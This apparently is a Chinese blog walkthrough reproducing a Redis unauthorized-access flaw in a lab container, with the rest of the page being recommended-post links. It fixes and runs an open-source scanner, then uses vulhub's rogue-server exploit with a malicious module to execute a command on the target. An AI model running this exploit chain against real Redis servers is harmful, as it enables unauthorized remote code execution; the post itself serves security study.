Redis未授权访问漏洞复现

Redis 简单使用

Redis 未设置密码,客户端工具可以直接链接。

Redis 是非关系型数据库系统,没有库表列的逻辑结构,仅仅以键值对的方式存储数据。

先启动容器

Redis 未设置密码,客户端工具可以直接链接

https://github.com/xk11z/unauthorized_com

这里上一个自动检测未授权漏洞的工具,中间挺多坑的,作者提供的安装步骤有问题,修改了一下

复制代码
git clone https://github.com/xk11z/unauthorized_com.git 

cd unauthorized_com

apt-get install python3-pip  

pip install -r requirements.txt 

python3 unauthorized_com.py

这里还是不能运行,需要修改几个文件

vim dic.py

这里要导入redis,可能需要下载

这里修改了一下检测代码

python3 unauthorized_com.py -i 192.168.142.151|grep redis

容器的作者还提供了一个方法

git clone https://github.com/vulhub/redis-rogue-getshell

编译

python3 redis-master.py -r 192.168.142.151 -p 6379 -L 192.168.142.151 -P 8888 -f RedisModulesSDK/exp.so -c "id"

可以看到,命令执行成功

相关推荐
*长铗归来*8 分钟前
MySQL新学知识(二)MySQL存储过程
数据库·mysql
科兽的AI小记21 分钟前
从Coze到BuildingAI:一个程序员对开源AI应用平台的实战体验
数据库·开源·创业
Boop_wu2 小时前
[MySQL] 数据库设计
java·数据库·oracle
xiaoye37082 小时前
达梦数据库连接配置yaml 文件配置
服务器·数据库·oracle
CS_GUIDER3 小时前
踩坑记录:Redis 连接报错 “Failed to get reply: connection reset“ 之端口冲突问题
redis
TDengine (老段)3 小时前
TDengine 数学函数 PI 用户手册
大数据·数据库·时序数据库·iot·tdengine·涛思数据
aristo_boyunv3 小时前
Redis发布订阅【充当消息中间件】
数据库·redis·缓存
zz-zjx4 小时前
MySQL 开源主从复制实战指南(SRE 可靠性优先版)
数据库·mysql·开源
Microsoft Word11 小时前
向量数据库与RAG
数据库·人工智能·向量数据库·rag
艾德金的溪12 小时前
redis-7.4.6部署安装
前端·数据库·redis·缓存